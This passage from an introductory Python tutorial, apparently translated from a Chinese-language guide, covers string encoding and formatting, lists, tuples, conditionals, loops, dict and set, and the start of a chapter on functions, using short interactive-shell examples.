UnicodeDecodeError: 'utf-8' codec can't decode byte 0xff in position 3: invalid start byte
If there are only a small number of invalid bytes in bytes
, you can pass errors='ignore'
to ignore the erroneous bytes.
>>> b'\xe4\xb8\xad\xff'.decode('utf-8', errors='ignore')
'中'
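Silently dropping bytes can hide data corruption. As a hedged alternative sketch, the standard errors='replace' handler keeps a visible marker (U+FFFD, the Unicode replacement character) wherever a byte could not be decoded. The variable names here are illustrative only.

```python
raw = b'\xe4\xb8\xad\xff'  # valid UTF-8 for '中' followed by one invalid byte

ignored = raw.decode('utf-8', errors='ignore')    # the invalid byte is dropped
replaced = raw.decode('utf-8', errors='replace')  # the invalid byte becomes U+FFFD

print(repr(ignored))           # '中'
print(len(replaced))           # 2
print(replaced == '中\ufffd')  # True
```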
To calculate how many characters str
contains, you can use the len()
function.
>>> len('ABC')
3
>>> len('中文')
2
The len() function counts the number of characters in a str; when given bytes, it counts the number of bytes.
>>> len(b'ABC')
3
>>> len(b'\xe4\xb8\xad\xe6\x96\x87')
6
>>> len('中文'.encode('utf-8'))
6
As you can see, 1 Chinese character will usually occupy 3 bytes after UTF-8 encoding, while 1 English character will occupy only 1 byte.
When manipulating strings, we often encounter the interconversion of str
and bytes
. To avoid garbling problems, you should always use UTF-8 encoding for str
and bytes
conversions.
Since Python source code is also a text file, when your source code contains Chinese, be sure to specify saving as UTF-8 when you save the source code. When the Python interpreter reads the source code, in order for it to read it in UTF-8, we usually write these two lines at the beginning of the file.
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
The first comment line tells Linux/macOS that this is a Python executable; Windows ignores it.
The second comment line tells the Python interpreter to read the source code as UTF-8; otherwise, Chinese text in the source code may come out garbled. (Python 3 already assumes UTF-8 for source files by default, so the declaration mainly makes the intent explicit.)
Declaring UTF-8 encoding does not by itself make your .py file UTF-8 encoded; you must also make sure that your text editor saves the file as UTF-8 without BOM.
If the .py
file itself uses UTF-8 encoding and also declares # -*- coding: utf-8 -*-
, opening a command prompt to test will display Chinese properly.
Formatting
The last common problem is how to output a formatted string. We often output strings like 'Hello dear xxx! Your phone bill for month xx is xx and your balance is xx', where the xxx parts change according to variables, so a convenient way to format strings is needed.
In Python, one formatting style is the same as in C and uses the % operator, for example:
>>> 'Hello, %s' % 'world'
'Hello, world'
>>> 'Hi, %s, you have $%d.' % ('Michael', 1000000)
'Hi, Michael, you have $1000000.'
As you may have guessed, the % operator is used to format strings. Inside a string, %s means substitute a string and %d means substitute an integer. For each %? placeholder there must be a corresponding variable or value after the % operator, in the same order. If there is only one %?, the parentheses can be omitted.
Common placeholders are.
Placeholders | Replacement Content |
---|---|
%d | Integer |
%f | Float |
%s | String |
%x | Hex Integer |
In addition, when formatting integers and floating-point numbers you can specify whether to pad with zeros and how many integer and fractional digits to show.
# -*- coding: utf-8 -*-
print('%2d-%02d' % (3, 1))
print('%.2f' % 3.1415926)
If you're not sure which placeholder to use, %s always works, since it converts any data type to a string:
>>> 'Age: %s. Gender: %s' % (25, True)
'Age: 25. Gender: True'
Sometimes the % inside a string is an ordinary character. In that case it must be escaped, using %% to represent a single %.
>>> 'growth rate: %d %%' % 7
'growth rate: 7 %'
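For reference, here is a small sketch of what the padding, precision, hexadecimal, and escape specifiers produce. The values are arbitrary examples, and the results are shown as comments.

```python
padded = '%2d-%02d' % (3, 1)   # width 2 padded with a space, then width 2 padded with zeros
rounded = '%.2f' % 3.1415926   # two digits after the decimal point
hexed = '%x' % 255             # lowercase hexadecimal
percent = '%d%%' % 7           # %% produces a literal percent sign

print(repr(padded))  # ' 3-01'
print(rounded)       # 3.14
print(hexed)         # ff
print(percent)       # 7%
```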
format()
Another way to format a string is to use the string's format() method, which replaces the placeholders {0}, {1}, ... in the string with the passed arguments in order, although this is more cumbersome to write than %:
>>> 'Hello, {0}, your score improved by {1:.1f}%'.format('Xiaoming', 17.125)
'Hello, Xiaoming, your score improved by 17.1%'
f-string
The last way to format strings is to use a string literal prefixed with f, called an f-string. It differs from a normal string in that any {xxx} it contains is replaced with the value of the corresponding variable:
>>> r = 2.5
>>> s = 3.14 * r ** 2
>>> print(f'The area of a circle with radius {r} is {s:.2f}')
The area of a circle with radius 2.5 is 19.62
In the above code, {r}
is replaced by the value of the variable r
, {s:.2f}
is replaced by the value of the variable s
, and the .2f
after :
specifies the formatting parameter (i.e., two decimal places are retained), so the result of the replacement of {s:.2f}
is 19.62
.
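To compare the three styles side by side, the sketch below formats the same values with %, format(), and an f-string. The names name and balance are illustrative, not taken from any library.

```python
name = 'Michael'
balance = 1234.5

with_percent = 'Hi, %s, you have $%.2f.' % (name, balance)
with_format = 'Hi, {0}, you have ${1:.2f}.'.format(name, balance)
with_fstring = f'Hi, {name}, you have ${balance:.2f}.'

print(with_fstring)                                  # Hi, Michael, you have $1234.50.
print(with_percent == with_format == with_fstring)   # True
```

All three produce the same text, so the choice is mostly about readability; f-strings keep the variable next to the place where it appears.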
Summary
Python 3's strings use Unicode, which directly supports multiple languages.
When str
and bytes
are converted to each other, the encoding needs to be specified. The most common encoding is UTF-8
, and Python certainly supports other encodings, such as encoding Unicode to GB2312
.
>>> '中文'.encode('gb2312')
b'\xd6\xd0\xce\xc4'
However, doing so just invites trouble. Unless you have a special business requirement, stick to UTF-8 encoding.
Formatting strings can be tested easily and quickly with Python's interactive environment.
Using lists and tuples
lists
One of Python's built-in data types is a list, an ordered collection of elements that can be added and removed at any time.
For example, listing the names of all the students in a class can be represented by a list.
>>> classmates = ['Michael', 'Bob', 'Tracy']
>>> classmates
['Michael', 'Bob', 'Tracy']
The variable classmates
is a list, and the number of elements in the list can be obtained using the len()
function.
>>> len(classmates)
3
Use the index to access the element at each position in the list, remembering that the index starts at 0
.
>>> classmates[0]
'Michael'
>>> classmates[1]
'Bob'
>>> classmates[2]
'Tracy'
>>> classmates[3]
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
IndexError: list index out of range
Python will report an IndexError
error when the index is out of range, so make sure the index doesn't go out of bounds, and remember that the index of the last element is len(classmates) - 1
.
To fetch the last element, besides calculating its index position, you can use -1 as the index to get the last element directly.
>>> classmates[-1]
'Tracy'
Likewise, you can fetch the second-to-last and third-to-last elements.
>>> classmates[-2]
'Bob'
>>> classmates[-3]
'Michael'
>>> classmates[-4]
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
IndexError: list index out of range
Of course, the fourth-to-last element is out of bounds.
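The relationship between negative and positive indexes can be checked directly. The sketch below also includes a small helper, get_or_default, which is hypothetical (not a built-in) and simply shows one way to avoid an IndexError.

```python
classmates = ['Michael', 'Bob', 'Tracy']

# For a valid negative index -k, classmates[-k] is classmates[len(classmates) - k].
for k in range(1, len(classmates) + 1):
    assert classmates[-k] == classmates[len(classmates) - k]

def get_or_default(items, index, default=None):
    """Hypothetical helper: return items[index], or default if the index is out of range."""
    try:
        return items[index]
    except IndexError:
        return default

print(get_or_default(classmates, -1))         # Tracy
print(get_or_default(classmates, -4, 'n/a'))  # n/a
```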
A list is a mutable ordered collection, so elements can be appended to its end.
>>> classmates.append('Adam')
>>> classmates
['Michael', 'Bob', 'Tracy', 'Adam']
It is also possible to insert an element into a specified position, such as the position with index number 1
.
>>> classmates.insert(1, 'Jack')
>>> classmates
['Michael', 'Jack', 'Bob', 'Tracy', 'Adam']
To delete the element at the end of a list, use the pop()
method.
>>> classmates.pop()
'Adam'
>>> classmates
['Michael', 'Jack', 'Bob', 'Tracy']
To delete the element at the specified position, use the pop(i)
method, where i
is the index position.
>>> classmates.pop(1)
'Jack'
>>> classmates
['Michael', 'Bob', 'Tracy']
To replace an element with another element, you can directly assign it to the corresponding index position.
>>> classmates[1] = 'Sarah'
>>> classmates
['Michael', 'Sarah', 'Tracy']
The data types of the elements inside the list can also be different, e.g.
>>> L = ['Apple', 123, True]
A list element can also be another list, e.g.
>>> s = ['python', 'java', ['asp', 'php'], 'scheme']
>>> len(s)
4
Note that s
has only 4 elements, where s[2]
is again a list, which is easier to understand if you split it up.
>>> p = ['asp', 'php']
>>> s = ['python', 'java', p, 'scheme']
To get 'php' you can write p[1] or s[2][1], so s can be seen as a two-dimensional array. Three-dimensional, four-dimensional, and higher-dimensional arrays work the same way, but they are rarely used.
If a list contains no elements at all, it is an empty list, which has length 0.
>>> L = []
>>> len(L)
0
tuple
Another kind of ordered collection is the tuple. Tuples are very similar to lists, but a tuple cannot be modified once it is initialized. For example, here is the same list of classmates' names as a tuple:
>>> classmates = ('Michael', 'Bob', 'Tracy')
Now the tuple classmates cannot be changed, and it has no methods such as append() or insert(). You can read elements with classmates[0] and classmates[-1] as usual, but you cannot assign a new value to any element.
What is the point of immutable tuples? Because tuples are immutable, the code is safer. If possible, try to use a tuple instead of a list.
The tuple trap: When you define a tuple, the elements of the tuple must be identified at the time of definition, e.g.
>>> t = (1, 2)
>>> t
(1, 2)
To define an empty tuple, you can write () as follows:
>>> t = ()
>>> t
()
However, to define a tuple with only 1 element, suppose you write:
>>> t = (1)
>>> t
1
What is defined is not a tuple but the number 1! This is because parentheses () can denote both a tuple and grouping in a mathematical expression, which creates ambiguity. Python therefore specifies that in this case the parentheses are treated as grouping, so the result is naturally 1.
Therefore, a tuple with only 1 element must be defined with a trailing comma , to disambiguate.
>>> t = (1,)
>>> t
(1,)
Python also adds a comma ,
when displaying tuples with only 1 element, so that you don't misinterpret them as parentheses in the mathematical sense.
Finally, look at a "mutable" tuple.
>>> t = ('a', 'b', ['A', 'B'])
>>> t[2][0] = 'X'
>>> t[2][1] = 'Y'
>>> t
('a', 'b', ['X', 'Y'])
This tuple is defined with 3 elements: 'a', 'b', and a list. How come it changed later?
Don't worry. When first defined, the tuple contains three elements: 'a', 'b', and the list ['A', 'B'].
When we change the list's elements 'A' and 'B' to 'X' and 'Y', the tuple becomes ('a', 'b', ['X', 'Y']).
On the surface, the elements of the tuple seem to have changed, but in fact it is the elements of the list that changed, not the elements of the tuple. The tuple still points to the same list it pointed to at the start. The so-called immutability of a tuple means that each element of the tuple always points to the same object: if it points to 'a', it cannot be changed to point to 'b', and if it points to a list, it cannot be changed to point to another object, but the list itself is mutable!
Now that "pointing to the same object" is clear, how do you create a tuple whose content also never changes? You must make sure that every element of the tuple is itself immutable.
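The difference between rebinding a tuple slot and mutating an object the tuple refers to can be seen in a short sketch. The names t, frozen, and inner_before are illustrative only.

```python
t = ('a', 'b', ['A', 'B'])

# Rebinding a tuple slot is rejected...
try:
    t[0] = 'z'
except TypeError as exc:
    print('TypeError:', exc)

# ...but mutating the list that the tuple refers to is allowed.
inner_before = id(t[2])
t[2][0] = 'X'
print(t)                          # ('a', 'b', ['X', 'B'])
print(id(t[2]) == inner_before)   # True: still the same list object

# A tuple made only of immutable elements cannot change at all.
frozen = ('a', 'b', ('A', 'B'))
try:
    frozen[2][0] = 'X'
except TypeError as exc:
    print('TypeError:', exc)
```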
Summary
Lists and tuples are Python's built-in ordered collections, one mutable and one immutable. Choose between them as needed.
Conditional Judgment
Conditional Judgment
The computer can do many automated tasks because it can make its own conditional judgments.
For example, entering the user's age and printing different things depending on the age is implemented in a Python program with the if
statement.
age = 20
if age >= 18:
    print('your age is', age)
    print('adult')
According to Python's indentation rules, if the condition of the if statement evaluates to True, the two indented print statements are executed; otherwise, nothing is done.
You can also add an else clause to if, meaning that if the condition evaluates to False, the if block is skipped and the else block is executed instead.
age = 3
if age >= 18:
    print('your age is', age)
    print('adult')
else:
    print('your age is', age)
    print('teenager')
Be careful not to omit the colon :.
Of course the above judgement is very rough, it is perfectly possible to make a more detailed judgement with elif
:
age = 3
if age >= 18:
    print('adult')
elif age >= 6:
    print('teenager')
else:
    print('kid')
elif
is short for else if
, and it is perfectly possible to have more than one elif
, so the full form of the if
statement is:
if <condition 1>:
    <action 1>
elif <condition 2>:
    <action 2>
elif <condition 3>:
    <action 3>
else:
    <action 4>
The if statement is evaluated from top to bottom. As soon as one condition evaluates to True, the corresponding block is executed and the remaining elif and else clauses are skipped. So, please test and explain why the following program prints teenager.
age = 20
if age >= 6:
    print('teenager')
elif age >= 18:
    print('adult')
else:
    print('kid')
The if
judgment condition can also be abbreviated, for example by writing.
if x:
    print('True')
As long as x
is a non-zero value, a non-empty string, a non-empty list, etc., it is judged to be True
, otherwise it is False
.
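The "etc." above can be made concrete. The sketch below lists some common values that are treated as False and True in a condition; the helper describe is hypothetical and only mirrors the abbreviated if x: form.

```python
falsy_values = [0, 0.0, '', [], (), {}, set(), None, False]
truthy_values = [1, -1, 'a', ' ', [0], (0,), {'k': 0}, True]

print(all(not bool(v) for v in falsy_values))  # True
print(all(bool(v) for v in truthy_values))     # True

def describe(x):
    """Hypothetical helper mirroring the abbreviated `if x:` form."""
    if x:
        return 'True'
    return 'False'

print(describe('0'))  # True: a non-empty string, even though it looks like zero
print(describe(0))    # False
```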
Reconsider input
Finally, let's look at a problematic conditional. Many students use input() to read the user's input, because typing the value in themselves makes the program more interesting to run:
birth = input('birth: ')
if birth < 2000:
    print('born before 2000')
else:
    print('born in 2000 or later')
Entering 1982
resulted in the following error.
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: '<' not supported between instances of 'str' and 'int'
This is because the data type returned by input()
is str
, which cannot be compared directly with an integer and must first be converted from str
to an integer. Python provides the int()
function to do this.
s = input('birth: ')
birth = int(s)
if birth < 2000:
    print('born before 2000')
else:
    print('born in 2000 or later')
Run it again and you will get the correct result. But what if you type abc
? Again, you will get an error message.
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
ValueError: invalid literal for int() with base 10: 'abc'
It turns out that the int()
function reports an error when it finds a string that is not a legal number, and the program exits.
How do you check for and catch program runtime errors? We'll talk about errors and debugging later.
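As a preview, and only as a sketch under assumptions, one common way to handle invalid input is to catch the ValueError that int() raises. The function names parse_birth_year and classify are hypothetical, and the functions take a string argument instead of calling input() so that they are easy to test.

```python
def parse_birth_year(text):
    """Hypothetical helper: return the year as an int, or None if text is not a valid integer."""
    try:
        return int(text)
    except ValueError:
        return None

def classify(text):
    """Hypothetical helper: classify a birth year given as a string."""
    birth = parse_birth_year(text)
    if birth is None:
        return 'invalid input'
    if birth < 2000:
        return 'born before 2000'
    return 'born in 2000 or later'

print(classify('1982'))  # born before 2000
print(classify('2005'))  # born in 2000 or later
print(classify('abc'))   # invalid input
```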
Summary
Conditional judgments allow the computer to make its own choices. Python's if...elif...else is very flexible.
Conditional judgments match from the top down, executing the corresponding block when the condition is met, and subsequent elifs and else's are no longer executed.
Loop
Loop
To calculate 1+2+3, we can simply write the expression.
>>> 1 + 2 + 3
6
To calculate 1+2+3+...+10, you can just about write it out.
However, to calculate 1+2+3+...+10000, writing the expression out directly is impractical.
For the computer to perform thousands of repeated operations, we need loop statements.
Python has two kinds of loops. The first is the for...in loop, which iterates through each element of a list or tuple in turn, for example:
names = ['Michael', 'Bob', 'Tracy']
for name in names:
    print(name)
Executing this code will print each element of names
in turn.
Michael
Bob
Tracy
So the for x in ...
loop is a statement that substitutes each element into the variable x
and then executes the indented block.
Another example is if we want to calculate the sum of integers from 1 to 10, we can use a sum
variable to do the accumulation.
sum = 0
for x in [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]:
    sum = sum + x
print(sum)
If you want to calculate the sum of integers from 1 to 100, writing out 1 to 100 by hand is tedious. Fortunately, Python provides a range() function that generates a sequence of integers, which can be converted to a list with the list() function. For example, range(5) generates the integers from 0 up to, but not including, 5:
>>> list(range(5))
[0, 1, 2, 3, 4]
range(101)
will generate a sequence of integers from 0-100, calculated as follows.
# -*- coding: utf-8 -*-
sum = 0
for x in range(101):
    sum = sum + x
print(sum)
Please run the above code yourself to see whether the result is the 5050 that the young Gauss worked out in his head.
The second type of loop is the while loop, which keeps looping as long as the conditions are met, and exits the loop when the conditions are not met. For example, if we want to calculate the sum of all odd numbers within 100, we can use a while loop to do the following.
sum = 0
n = 99
while n > 0:
    sum = sum + n
    n = n - 2
print(sum)
Inside the loop, the variable n
keeps decreasing itself until it becomes -1
, when the while condition is no longer met and the loop exits.
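To check the results of both loops, the sketch below wraps the while loop in a function and compares it with the built-in sum() over a range(). The function name sum_odd_below_100 is illustrative, and the accumulator is called total here (an assumption of this sketch) so that it does not shadow the built-in sum().

```python
def sum_odd_below_100():
    """Sum the odd numbers 99, 97, ..., 1 with the same while loop as above."""
    total = 0
    n = 99
    while n > 0:
        total = total + n
        n = n - 2
    return total

print(sum_odd_below_100())     # 2500
print(sum(range(1, 100, 2)))   # 2500, the same odd numbers via range(start, stop, step)
print(sum(range(101)))         # 5050
```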
break
In a loop, the break statement exits the loop early. For example, here is a loop that prints the numbers 1 to 100:
n = 1
while n <= 100:
    print(n)
    n = n + 1
print('END')
The code above prints out 1 to 100.
To end the loop early, you can use the break
statement.
n = 1
while n <= 100:
    if n > 10:  # When n = 11, the condition is met and the break statement is executed
        break  # The break statement will end the current loop
    print(n)
    n = n + 1
print('END')
As you can see from the above code, after printing out 1~10, END
is printed immediately afterwards and the program ends.
It can be seen that the function of break
is to end the loop early.
continue
During a loop, you can also use the continue statement to skip the rest of the current iteration and start the next one directly.
n = 0
while n < 10:
    n = n + 1
    print(n)
The above program prints 1 to 10. However, if we want to print only odd numbers, we can skip certain loops with the continue
statement.
n = 0
while n < 10:
    n = n + 1
    if n % 2 == 0:  # If n is an even number, execute the continue statement
        continue  # The continue statement jumps to the next iteration, so the print() below is skipped
    print(n)
Executing the above code, you can see that it no longer prints 1 to 10, but 1, 3, 5, 7, and 9.
You can see that the purpose of continue
is to end the current loop early and start the next one directly.
Summary
Loops are an effective way to get the computer to do repetitive tasks.
The break statement exits the loop immediately, while the continue statement ends the current iteration early and starts the next one. Both statements usually need to be used together with an if statement.
Be especially careful not to overuse break and continue. They can make the execution logic branch too much and become error-prone. Most loops do not need break or continue, and both examples above could be rewritten without them by changing the loop condition or the loop logic.
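As one possible rewrite (a sketch, not the only way), the two examples can be expressed without break and continue. The results are collected in lists named first_ten and odds, which are illustrative names, so that they are easy to inspect.

```python
# Without break: stop at 10 by tightening the loop condition.
first_ten = []
n = 1
while n <= 10:
    first_ten.append(n)
    n = n + 1

# Without continue: only act on odd values instead of skipping even ones.
odds = []
n = 0
while n < 10:
    n = n + 1
    if n % 2 == 1:
        odds.append(n)

print(first_ten)  # [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
print(odds)       # [1, 3, 5, 7, 9]
```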
In some cases, buggy code makes the program fall into an infinite loop, that is, a loop that goes on forever. In this case, you can press Ctrl+C to exit the program or force the Python process to end.
Please try to write an infinite loop program.
Using dict and set
dict
Python has built-in support for dictionaries: dict, known as a map in some other languages, stores key-value pairs and offers extremely fast lookup.
For example, suppose you want to find the corresponding grades based on the names of your classmates, and if you implement it with lists, you need two lists.
names = ['Michael', 'Bob', 'Tracy']
scores = [95, 75, 85]
Given a name, to find the corresponding score you first have to find its position in names and then take the score at that position from scores; the longer the list, the longer this takes.
With a dict, we only need a single name-to-score lookup table and can find a score directly from the name. No matter how big the table is, lookup does not slow down. A dict is written in Python as follows:
>>> d = {'Michael': 95, 'Bob': 75, 'Tracy': 85}
>>> d['Michael']
95
Why is dict lookup so fast? Because a dict works on the same principle as looking up a character in a dictionary. Suppose the dictionary contains 10,000 Chinese characters and we want to look up a certain character. One way is to page through the dictionary from the first page until we find the character we want. This is how elements are found in a list: the larger the list, the slower the search.
The second way is to first look up the character's page number in the dictionary's index (e.g., the radical index), and then turn directly to that page. No matter which character you are looking for, this search is very fast and does not slow down as the dictionary grows.
Given a name, such as 'Michael'
, dict can internally calculate the "page number" of Michael
, which is the memory address where the number 95
is stored, and take it out directly, so it is very fast.
As you can guess, with this key-value storage, the storage location of a value must be computed from its key when it is put in, so that the value can be fetched directly by key later.
Besides specifying data at initialization, you can also put data into a dict by key:
>>> d['Adam'] = 67
>>> d['Adam']
67
Since a key can correspond to only one value, putting a value under the same key multiple times overwrites the previous value:
>>> d['Jack'] = 90
>>> d['Jack']
90
>>> d['Jack'] = 88
>>> d['Jack']
88
If the key does not exist, dict will report an error.
>>> d['Thomas']
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
KeyError: 'Thomas'
To avoid the error that the key does not exist, there are two ways, one is to determine whether the key exists by in
.
>>> 'Thomas' in d
False
The second is through the get()
method provided by dict, which can return None
if the key does not exist, or the value specified by itself.
>>> d.get('Thomas')
>>> d.get('Thomas', -1)
-1
Note: Python's interactive environment does not show the result when None
is returned.
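A frequent use of the get() default is counting. The sketch below repeats the two lookups from above and then counts letters in a word; the names scores and counts are illustrative, and the printed key order assumes Python 3.7 or later, where dicts keep insertion order.

```python
scores = {'Michael': 95, 'Bob': 75, 'Tracy': 85}

# `in` checks for a key without raising KeyError.
print('Thomas' in scores)        # False

# get() returns None, or the supplied default, for a missing key.
print(scores.get('Thomas'))      # None
print(scores.get('Thomas', -1))  # -1

# Counting occurrences: a missing letter starts from the default 0.
counts = {}
for letter in 'banana':
    counts[letter] = counts.get(letter, 0) + 1
print(counts)  # {'b': 1, 'a': 3, 'n': 2}
```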
To delete a key, use the pop(key)
method, and the corresponding value will also be deleted from the dict.
>>> d.pop('Bob')
75
>>> d
{'Michael': 95, 'Tracy': 85}
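Note that a dict locates values by hashing the key, not by position. Although iteration follows insertion order (guaranteed since Python 3.7), the internal storage location of a key has no relation to the order in which keys were added.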
Compared with list, dict has the following features.
- the speed of lookup and insertion is extremely fast and does not slow down with the increase of keys.
- it takes up a lot of memory and wastes a lot of memory.
On the contrary, list has the following features.
- the search and insertion time increases with the increase of elements.
- takes up little space and wastes little memory.
So, dict is a way to trade space for time.
A dict can be used wherever fast lookup is needed and is almost ubiquitous in Python code. Using dict correctly is very important, and the first thing to remember is that a dict key must be an immutable object.
This is because dict calculates the storage location of value based on key, and if each time the same key is calculated the result is different, then the dict is completely confused internally. This algorithm for calculating the location by key is called a hash algorithm (Hash).
To ensure the correctness of the hash, the object that is the key cannot change. In Python, strings, integers, etc. are immutable and can therefore be safely used as keys, whereas lists are mutable and cannot be used as keys.
>>> key = [1, 2, 3]
>>> d[key] = 'a list'
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: unhashable type: 'list'
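Whether an object can serve as a key can be tested with the built-in hash() function. The helper is_hashable below is hypothetical, written only to illustrate the rule described above.

```python
def is_hashable(obj):
    """Hypothetical helper: True if obj can be used as a dict key."""
    try:
        hash(obj)
    except TypeError:
        return False
    return True

print(is_hashable('Michael'))   # True
print(is_hashable(42))          # True
print(is_hashable(3.14))        # True
print(is_hashable([1, 2, 3]))   # False: lists are mutable
print(is_hashable({'a': 1}))    # False: dicts are mutable too

# Equal keys hash equally within one run, so a lookup finds the same slot.
print(hash('Michael') == hash('Mich' + 'ael'))  # True
```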
set
A set is similar to a dict in that it is also a collection of keys, but it does not store values. Since keys cannot be duplicated, a set contains no duplicate keys.
To create a set, pass a list as the input collection:
>>> s = set([1, 2, 3])
>>> s
{1, 2, 3}
Note that the passed parameter [1, 2, 3]
is a list, and the displayed {1, 2, 3}
just tells you that there are 3 elements inside this set, 1, 2, 3, and the displayed order does not indicate that the set is ordered.
Duplicate elements are automatically filtered in the set.
>>> s = set([1, 1, 2, 2, 3, 3])
>>> s
{1, 2, 3}
Elements can be added to the set with the add(key) method. Adding the same element repeatedly is allowed but has no effect:
>>> s.add(4)
>>> s
{1, 2, 3, 4}
>>> s.add(4)
>>> s
{1, 2, 3, 4}
Elements can be removed by the remove(key)
method.
>>> s.remove(4)
>>> s
{1, 2, 3}
A set can be seen as an unordered collection of unique elements in the mathematical sense, so two sets support mathematical operations such as intersection and union:
>>> s1 = set([1, 2, 3])
>>> s2 = set([2, 3, 4])
>>> s1 & s2
{2, 3}
>>> s1 | s2
{1, 2, 3, 4}
The only difference between set and dict is that a set stores no corresponding values. The underlying principle is the same, so mutable objects cannot be put into a set either: a mutable object's content could change after insertion, so the set could no longer guarantee that it contains no duplicate elements. Try putting a list into a set and see whether you get an error.
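Beyond intersection and union, sets support a few more standard operations. The sketch below uses the {...} set literal, which is equivalent to calling set() on a list, and wraps results in sorted() because a set's display order is not guaranteed.

```python
s1 = {1, 2, 3}   # set literal; equivalent to set([1, 2, 3])
s2 = {2, 3, 4}

print(sorted(s1 & s2))   # [2, 3]        intersection
print(sorted(s1 | s2))   # [1, 2, 3, 4]  union
print(sorted(s1 - s2))   # [1]           difference
print(sorted(s1 ^ s2))   # [1, 4]        symmetric difference

# Removing duplicates from a list.
print(sorted(set([3, 1, 2, 3, 1])))  # [1, 2, 3]

# discard() is like remove() but does not raise KeyError for a missing element.
s1.discard(99)
print(s1 == {1, 2, 3})   # True
```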
Immutable objects revisited
As we said above, str is an immutable object, while list is a mutable object.
For mutable objects, such as list, the contents of list will change if list is manipulated, for example.
>>> a = ['c', 'b', 'a']
>>> a.sort()
>>> a
['a', 'b', 'c']
And for immutable objects, such as str, what happens when we operate on a str?
>>> a = 'abc'
>>> a.replace('a', 'A')
'Abc'
>>> a
'abc'
Although the string has a replace()
method, and it does turn out to be 'Abc'
, the variable a
still ends up being 'abc'
, so how should we understand it?
Let's change the code to the following.
>>> a = 'abc'
>>> b = a.replace('a', 'A')
>>> b
'Abc'
>>> a
'abc'
The thing to always keep in mind is that a
is the variable, and 'abc'
is the string object! There are times when we often say that the content of the object a
is 'abc'
, but what we really mean is that a
itself is a variable, and it is the content of the object it points to that is 'abc'
.
┌───┐ ┌───────┐
│ a │─────────────────>│ 'abc' │
└───┘ └───────┘
When we call a.replace('a', 'A')
, the call to method replace
actually acts on the string object 'abc'
, and the method, despite its name replace
, does not change the content of the string 'abc'
. Instead, the replace
method creates a new string 'Abc'
and returns it, and if we use the variable b
to point to that new string, it is easy to understand that the variable a
still points to the original string 'abc'
, but the variable b
points to the new string 'Abc'
.
┌───┐ ┌───────┐
│ a │─────────────────>│ 'abc' │
└───┘ └───────┘
┌───┐ ┌───────┐
│ b │─────────────────>│ 'Abc' │
└───┘ └───────┘
So, for immutable objects, calling any method on the object itself will not change the content of the object itself. Instead, these methods create new objects and return them, thus ensuring that the immutable object itself is always immutable.
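The contrast between an in-place method on a mutable object and a method on an immutable object can be summarized in a short sketch. The variable names are illustrative only.

```python
# list.sort() mutates the list in place and returns None.
letters = ['c', 'b', 'a']
same_list = letters          # a second name for the same list object
result = letters.sort()
print(result)                # None
print(same_list)             # ['a', 'b', 'c']  (the one list object was changed)

# str methods never modify the string; they return a new object.
a = 'abc'
b = a.replace('a', 'A')
print(a, b)                  # abc Abc
print(a is b)                # False

# To "change" a, rebind the name to the new string.
a = a.upper()
print(a)                     # ABC
```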
Summary
Using a key-value storage structure for dict is very useful in Python. It is important to choose immutable objects as keys, and the most common key is a string.
While tuple is an immutable object, try putting (1, 2, 3)
and (1, [2, 3])
into a dict or set and interpret the results.
Python Programming Quick Guide - Functions
https://www.liaoxuefeng.com/wiki/1016959663602400/1017063413904832
https://docs.python.org/3/tutorial/index.html
Function
We know that the formula for calculating the area of a circle is
S = πr^2
When we know the value of radius r
, we can calculate the area according to the formula. Suppose we need to calculate the area of 3 circles of different sizes.
r1 = 12.34
r2 = 9.08
r3 = 73.1
s1 = 3.14 * r1 * r1
s2 = 3.14 * r2 * r2
s3 = 3.14 * r3 * r3
When code repeats in a regular pattern like this, be wary: writing 3.14 * x * x each time is not only tedious, but if you later want to change 3.14 to 3.14159265359, you have to replace every occurrence.
With functions, instead of writing s = 3.14 * x * x
every time, we write the more meaningful function call s = area_of_circle(x)
, and the function area_of_circle
itself only needs to be written once, so it can be called multiple times.
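A minimal sketch of such a function is shown below. Using math.pi instead of the literal 3.14 is a choice made for this example, not something the text prescribes; the point is that the constant now lives in exactly one place.

```python
import math

def area_of_circle(r):
    """Return the area of a circle with radius r."""
    return math.pi * r * r

# The three radii from the example above.
for r in (12.34, 9.08, 73.1):
    print(f'radius {r}: area {area_of_circle(r):.2f}')
```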
Basically all high-level languages support functions, and Python is no exception. Not only is Python very flexible in defining functions, but it also has many useful built-in functions that can be called directly.
Abstraction
Abstraction is a very common concept in mathematics. As an example.
Calculating the sum of a series, e.g. 1 + 2 + 3 + ... + 100, is very inconvenient to write out, so mathematicians invented the summation symbol ∑, with which 1 + 2 + 3 + ... + 100 can be written as:
$$\sum_{n=1}^{100} n$$
This abstract notation is very powerful because we can read ∑ directly as a summation, rather than reducing it to low-level addition operations.
Moreover, this abstract notation is extensible, e.g.
$$\sum_{n=1}^{100} (n^2 + 1)$$
Reduced to addition, it becomes:
(1 x 1 + 1) + (2 x 2 + 1) + (3 x 3 + 1) + ... + (100 x 100 + 1)
As you can see, abstraction allows us to think directly at a higher level, without caring about the underlying concrete computational process.
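The same idea carries over to code. As a small sketch, Python's built-in sum() plays the role of ∑, so neither series has to be written out term by term.

```python
# Sum of n for n = 1..100
print(sum(range(1, 101)))                      # 5050

# Sum of (n*n + 1) for n = 1..100
print(sum(n * n + 1 for n in range(1, 101)))   # 338450
```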
Writing computer programs is the same, and functions are one of the most basic ways of abstracting code.
Calling functions
Python has a lot of useful functions built in that we can call directly.
To call a function, you need to know its name and its arguments. For example, the function abs, which returns the absolute value, takes exactly one argument. Its documentation can be viewed on Python's official website at:
http://docs.python.org/3/library/functions.html#abs
You can also view the help information for the abs
function at the interactive command line via help(abs)
.
To invoke the abs
function.
>>> abs(100)
100
>>> abs(-20)
20
>>> abs(12.34)
12.34
Calling a function with the wrong number of arguments raises a TypeError, and Python tells you explicitly that abs() takes exactly 1 argument but 2 were given:
>>> abs(1, 2)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: abs() takes exactly one argument (2 given)
If the number of arguments is correct but the type of an argument is not accepted by the function, a TypeError is also raised, and the error message says that str is the wrong argument type:
>>> abs('a')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: bad operand type for abs(): 'str'
The max() function, by contrast, can take any number of arguments and returns the largest one:
>>> max(1, 2)
2
